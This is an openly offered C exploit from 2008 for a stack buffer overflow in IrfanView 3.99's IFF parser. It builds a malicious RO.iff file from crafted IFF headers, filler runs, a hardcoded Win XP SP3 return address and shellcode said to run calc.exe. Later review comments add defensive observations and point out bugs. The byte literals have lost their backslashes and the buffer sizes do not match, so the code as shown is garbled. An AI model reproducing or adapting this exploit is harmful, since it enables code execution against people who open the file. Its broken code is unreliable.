
# Title : IrfanView <= 3.99 IFF File Local Stack Buffer Overflow Exploit
# Published : 2008-08-01
# Author : fl0 fl0w


/*Irfan View 3.99 .IFF File Local Stack Buffer Overflow 
  This sploit runs calc.exe, tested on Win XP Pro sp3; if
  you run it on another version of Windows make sure you change the 
  retaddress, but it works almost all the time so.. .
  Credits for finding the bug and sploit go to fl0 fl0w.
  Gretez to all romanian coderz  :)  ! 
  Have a blast ! ! 
*/
#include <stdio.h>
#include <stdlib.h>

#define SF "RO.iff"   /* name of the file main() writes into the current directory */
#define OFFSET 2100   /* byte position in that file at which main() stores the 4-byte retaddress */

// Payload bytes that main() copies into the output file directly after the
// 4-byte retaddress value.  The author attributes them to Metasploit and the
// header comment says they start calc.exe; neither claim is verified here.
// NOTE(review): every escape in these literals has lost its backslash ("xeb"
// where "\xeb" would be expected), so as posted each "xNN" is three plain
// characters, not one byte -- most likely an artifact of how the listing was
// extracted.  The same applies to the iff1/iff2/iff3 arrays below.
 char shellcode[]=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x5ax37x6ax63"
"x58x30x42x30x50x42x6bx42x41x73x41x42x32x42x41x32"
"x41x41x30x41x41x58x38x42x42x50x75x38x69x69x6cx38"
"x68x41x54x77x70x57x70x75x50x6ex6bx41x55x55x6cx6e"
"x6bx43x4cx66x65x41x68x45x51x58x6fx4cx4bx50x4fx62"
"x38x6ex6bx41x4fx31x30x36x61x4ax4bx41x59x6cx4bx74"
"x74x6ex6bx44x41x4ax4ex47x41x4bx70x6fx69x6cx6cx4c"
"x44x4bx70x43x44x76x67x4bx71x4ax6ax66x6dx66x61x39"
"x52x5ax4bx4ax54x75x6bx62x74x56x44x73x34x41x65x4b"
"x55x4ex6bx73x6fx54x64x53x31x6ax4bx35x36x6cx4bx64"
"x4cx30x4bx6cx4bx73x6fx57x6cx75x51x6ax4bx6cx4bx37"
"x6cx6cx4bx77x71x68x6bx4cx49x71x4cx51x34x43x34x6b"
"x73x46x51x79x50x71x74x4cx4bx67x30x36x50x4cx45x4b"
"x70x62x58x74x4cx6cx4bx53x70x56x6cx4ex6bx34x30x47"
"x6cx4ex4dx6cx4bx70x68x37x78x58x6bx53x39x6cx4bx4f"
"x70x6cx70x53x30x43x30x73x30x6cx4bx42x48x77x4cx61"
"x4fx44x71x6bx46x73x50x72x76x6bx39x5ax58x6fx73x4f"
"x30x73x4bx56x30x31x78x61x6ex6ax78x4bx52x74x33x55"
"x38x4ax38x69x6ex6cx4ax54x4ex52x77x79x6fx79x77x42"
"x43x50x61x70x6cx41x73x64x6ex51x75x52x58x31x75x57"
"x70x63";

// Start of the crafted file: 32 rows of 16 byte values (read them as hex; the
// backslashes of the \xNN escapes are missing in this listing).  The leading
// bytes spell the IFF container tags "FORM" (x46x4Fx52x4D), "ILBM" and "BMHD"
// on the first row and "CMAP" on the third.  Two length fields stand out for a
// defender: the FORM size (x00x01x0Bx7E = 68478) is far larger than anything
// main() writes, and the CMAP size (x00x00x0Cx00 = 3072) exceeds what follows
// it in the output.  A reader that trusts these chunk lengths instead of
// bounding them by the remaining input is what a file like this appears to
// exercise; checking every chunk length against the bytes actually available
// is the corresponding defence.
char iff1[]=
"x46x4Fx52x4Dx00x01x0Bx7Ex49x4Cx42x4Dx42x4Dx48x44"
"x00x00x00x14x01xFDx01xB6x00x00x00x00x08x00x01x00"
"x00x00xC7xC7x01xFDx01xB6x43x4Dx41x50x00x00x0Cx00"
"x1Bx1Bx19xFFxFFxFFxBCxD7xEAxEFx64x2Ex73xA9xD2xD9"
"xD9xD9x13x6ExB6x00x68xB4x70x70x70xF0x92x6Cx2ExCC"
"xCCxFAxF2xE6x99x99x99x50x94xC5xF1xE9xE6xF7xADx32"
"xACxB4xB4x4Dx4Bx48xF0xC9xB4xABx85x38xE0xE9xEFxEC"
"xE5xDExEFxB4x98x2Ex80xBCxE5x98x3Ax8Cx8Cx8CxEFxE0"
"xD3xA6xC4xD9x33x33x33x8CxB6xD5xC6xD5xDDxFAxF7xF3"
"xFEx01x02x00x00x00x00x00x00x00x00x03xFBxEFx3Fx78"
"xE8xFFx00xF8xDFx00x03x04x10x40x41xE7x00xEBx00x00"
"xC0xF4x00x01x41x56xE7x00xDFx00x03x04x30x40xC7xE7"
"x00xEAx00x00x18xF7x00x03x03xE0x80x5ExE7x00xC1x00"
"xC1x00xC1x00xEBxFFx01x7FxE7xF7xFFx03xFCxA7x7Ex72"
"xE8xFFx00xF8xDDx00x01x01x64xE7x00xDFx00x00x01xFF"
"x00x01x60x80xE8x00xEBx00x00x80xF6x00x03x05xC8x81"
"x6ExE7x00xEBx00x01x40x10xF7x00x03x04xA0x40x72xE7"
"x00xC1x00xC1x00xC1x00xEBxFFx01x3Fx87xFFxFFx00xDD"
"xFCxFFx05xEFxF7xFFxE7x9Ex66xE8xFFx00xF8xEAx00x04"
"x60x00xA0x22x01xFEx00x07x20x50x08x00x10x01x09x80"
"xE8x00xECx00x05x01x20x69x80xE0x63xFFx03x04x01x80"
"x60x70x18xFEx00x01xA8x80xE8x00xEAx00x04x68x00xA0"
"x22x01xFEx00x07x20x50x08x04x14xA1x89x80xE8x00xEC"
"x00x05x01x00x18x80xA0x40xFFx01x09x00x80x20x40x00"
"x06x04x80xA0x80xE8x00xC1x00xC1x00xC1x00xECxFFx10"
"xFEx3Fx81x7Ex4Dx97x38x73xB9xFAx4Fx2FxD3xFFxF1x0E"
"x67xE8xFFx00xF8xEAx00x00x04xFFx02x00x08xFFx00x08"
"x40x00x01x00x02x00x0Ax01x60xE7x00xEBx00x0Fx02x4A"
"xA2xA0x48xC3x04x02x20xA1x54x2Ax00x02x20xF0xE7x00"
"xECx00x10x01xC0xCEx83xB2xC8xC7x0Cx42x00xA1xD0x6E"
"x04x0AxF1xF8xE7x00xEBx00x05x23xFBxC2xE1xE7x83xFF"
"x87x07xC7xF1x78x7Ax06x00x20xF0xE7x00xC1x00xC1x41";

 // Filler copied directly after iff1: 66 rows of the byte 0x58 ('X'), the very
 // last value being 0x48.  A run this long and this uniform inside a CMAP/body
 // region is not plausible image data, which makes it a usable signal for
 // file-content detection and for triaging crashes on malformed IFF input.
 char iff2[]=
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x48";

 // Second filler run, copied after iff2: 32 rows of 0x58 ('X') followed by
 // 20 bytes of 0x41 ('A').  main() later overwrites the region at OFFSET with
 // the retaddress value and the shellcode array, so part of this filler does
 // not survive into the output file.
 char iff3[]=
 "x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58x58"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41";

 /*
  * Assembles the crafted file in a heap buffer and writes it to SF.
  * Layout as built below:
  *   byte 0 ..     iff1, iff2, iff3 copied back to back (IFF headers + filler)
  *   byte OFFSET   the 4-byte value of retaddress, in host byte order
  *   OFFSET + 4    the shellcode array
  * Only the first sizeof(iff2)*2 + sizeof(iff3) + 1 bytes of the buffer are
  * written out.  Returns 0 in every case, including the fopen failure path.
  *
  * Review notes (the code is left exactly as posted):
  *  - memcpy is used without <string.h>; this relies on an implicit
  *    declaration, which is not valid C99 or later.
  *  - The malloc size expression does not mirror the copies that follow
  *    (iff1 is absent, iff2 appears twice), and the trailing "+4+1" is added
  *    to the returned pointer rather than to the requested size, so the first
  *    five allocated bytes are never used and the pointer passed around is not
  *    the one malloc returned (and could not be freed).
  *  - The fwrite length is larger than the region the memcpy calls fill, so the
  *    tail of the output consists of whatever malloc handed back.  The produced
  *    file is therefore not reproducible byte for byte and may carry heap
  *    contents; a hash of an RO.iff made by this program is not a stable
  *    indicator, the header bytes and the filler runs are.
  *  - On fopen failure the program prints "error" and exit(0)s, i.e. reports
  *    success.  fclose's return value is not checked either.
  *  - The printf strings end in a bare "n" where "\n" is evidently meant; the
  *    same lost-backslash artifact as in the byte arrays above.
  */
 int main()
{
	FILE* k;
	char *buffer;
	int offset=0;
	unsigned int retaddress=0x7C8369F0;   /* fixed address; the header says it was chosen for Win XP SP3 */
    buffer=(char *)malloc(OFFSET+sizeof(iff2)+sizeof(iff2)+sizeof(iff3))+4+1;   /* see review notes: "+4+1" offsets the pointer, not the size; result unchecked */
    
     if((k=fopen(SF,"wb"))==NULL)
   { printf("error"); exit(0); } 

	/* iff1, iff2, iff3 are copied contiguously, terminating NULs included */
	memcpy(buffer,iff1,sizeof(iff1));
	offset=sizeof(iff1);
	memcpy(buffer+offset,iff2,sizeof(iff2)); 		
    offset+=sizeof(iff2);
	memcpy(buffer+offset,iff3,sizeof(iff3));
	offset+=sizeof(iff3);
	offset=0;          /* redundant: immediately overwritten on the next line */
	offset=OFFSET;
	memcpy(buffer+offset,&retaddress,4);   /* raw copy of the unsigned int: host endianness */
	offset+=4;
	memcpy(buffer+offset,shellcode,sizeof(shellcode));
	/* length is independent of how much was actually filled in above */
	fwrite( buffer, 1,sizeof(iff2)+sizeof(iff2)+sizeof(iff3)+1, k );
    printf("|--------------------------------------------------------------------------|n");
   printf("Irfan View 3.99 .IFF File Local Stack Buffer Overflow n");
   printf("Credits for finging the bug and sploit go to fl0 fl0wn");
   printf(".IFF file done.. open with Irfan View and have a blast! n" );
   printf("|--------------------------------------------------------------------------|n");
   fclose(k);
	return 0;
	
}

// www.Syue.com [2008-08-01]